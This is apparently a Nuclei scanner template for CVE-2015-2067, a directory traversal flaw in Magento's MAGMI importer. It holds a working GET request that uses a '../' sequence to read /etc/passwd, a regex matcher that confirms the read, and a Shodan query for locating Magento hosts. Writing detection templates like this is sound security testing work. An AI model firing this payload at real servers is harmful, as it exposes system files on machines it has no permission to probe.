my-nuclei-templates/CVE-2015-2067.yaml

35 lines
1.1 KiB
YAML

id: CVE-2015-2067
info:
name: Magento Server MAGMI - Directory Traversal
author: daffainfo
severity: high
description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
- http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
classification:
cve-id: CVE-2015-2067
metadata:
shodan-query: http.component:"Magento"
tags: cve,cve2015,lfi,magento,magmi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08